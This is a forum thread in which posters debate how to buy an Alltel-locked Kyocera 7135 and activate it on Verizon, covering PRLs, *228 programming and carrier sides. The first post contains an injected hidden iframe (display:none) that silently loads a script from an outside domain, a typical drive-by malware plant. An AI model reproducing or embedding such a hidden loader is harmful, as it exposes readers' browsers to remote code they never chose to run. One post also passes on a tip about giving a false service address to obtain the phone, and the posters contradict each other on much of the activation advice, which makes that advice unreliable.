Since many people are interested in obtaining the 7135 from the Kyocera website and activate the phone with Verizon services. Can some please provide the necessary steps to:
1) Get the phone from Getconnected.com (Kyocera)
2) Activate the phone from Verizon.
The length of each thread has gotten so long that it is difficult to find the desired information to understand whether this is really an option.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
You need to find someone at Verizon who can flash the phone with a PRL (the list that tells the phone what towers to connect to) from verizon. If not, then the phone will only recognize alltel towers, even if you manually program in your current verizon phone number.

I am wrong? I thought that this is what *228 did---
Yes it does. But when you get the phone from from alltel, which towers will it be looking for? Verizon's? No. It will be looking for alltel's. When you get a phone from Verizon, does it look for Alltel towers? No. The phone needs to be connected to a Verizon tower to get the verizon information downloaded to it. Hence the need for a Verizon PRL.
The phone has got to have a Verizon PRL in it to activate it.
As I mentioned in a previous thread, I spoke with Reggie at GetConnected on Friday and he told me the phones (without plans) that are available for sale are already programmed and locked for AllTel service. That being said, I did not continue the quest of purchasing and going to Verizon. I am going to wait the month and make sure it is properly setup, plus there will probably be a discount with purchase and plan.
As long as they don't have a MSL code in it to prevent it from being programmed, its no problem to get a PRL in them. They don't have to taken to a Verizon service center either. When programming the phone Over The Air, you just add on 00 or 01 to the *228 code. So if you are in a market where Verizon is the A side carrier, you do *22800 and it will override the Alltel PRL and force it to Verizons system and download the current PRL. You do *22801 if Verizon is the B side carrier for you.

This is what I thought as well. The PRL is simply the Preferred Roaming List and tells the phone what towers to look for. It is done OTA or Over the Air now as opposed to the way it was done a few years ago--
This is what tells the phone what towers to look for? Am I missing something Mr. Greasy Spoon?

Question 1: Are you talking about doing this with a phone that already has a Verizon PRL, rather than an Alltel PRL? If not, how do you suggest that the Alltel programming will recognize *22800 as needing to attach to a verizon tower? While the two companies do work rather closely, they are still seperate companies with seperate networks. (With seperate PRL's)
Question 2: What happens if Verizon is not the A or B carrier? What happens if the license they hold is C, D, E, F... from the PCS auctions? What appends *228 then?
Question 3: What if, as in my area, Alltel bought the B side carrier, and verizon is the C or D (I can't remember) carrier? What appends *228 then?
Question 4: What if alltel does not currently offer OTA (as is the case)?
I await your reply
You are pretty rude, cloudy... Heveans, it is only a cell phone.

For those of us who do not understand the technical cell phone jargon, what do you mean by "A side" and "B side" carriers, and how would we find out what Verizon is in our area?
Also, I just bought my wife a new phone from Officemax, and activated it over a phone call. They asked for the esn # and after that I just had to dial the *228 number to get it programmed and activated. For the 7135-Alltel locked phone, are you saying that this procedure would be exactly the same, except we add a 00 or 01 at the end of the *228? Also, from your experience, do you think the Verizon customer service over the phone would have any problem with us when we give them an esn# for a phone they do not yet support?

Lets see;
1. goto getconnected.com and order the phone
2. call Verizon customer support and tell them you have a phone you'd like to have activated on the network.

Hrmmm?
Well, I just took it one click before "finalize your order" for the 4th time, easy all 4 times. I put in an Akron, OH service zip code, and had my billing and shipping address in NJ where I live. I will not attempt to answer for anyone else here, as we are all capable of answewring for ourselves. The reason I did not "finalize" my order(s) is that it cost too much money to purchase the 7135 without a service plan. So, I'm waiting for an official Verizon launch date, plus I just made 4 guesses for the FREE 7135, so I'm going to wait for that to pass before I make any silly spending decisions.
By waiting one o f two things will happen. 1. I'll win the free 7135 or 2. I'll wait for an official verizon launch and take advantge of my savings there. I figure a 2yr contract with phone 2 V will be around $499 or so.
NOW WHAT!!! I decided to bite the dust and order a full priced 7135. When I called "getconnected" they wouldn't sell me one because I don't live in an Alltel area. I live in a Verizon area and Verizon is saying bring one in and we'll activate it. Any suggestions as to how I get one?

Sorry--But I thought you were being the rude one--You seemed mighty condescending in your first reply to me. If I misread it I appologize---I guess we can't always tell the expressions of ones words when written---

Others are reporting that as long as you give them an address that has ALLTEL service as your "service area," then they will send it to any address you want...I haven't personally tried this...I'm just going to wait it out for an official Verizon release...
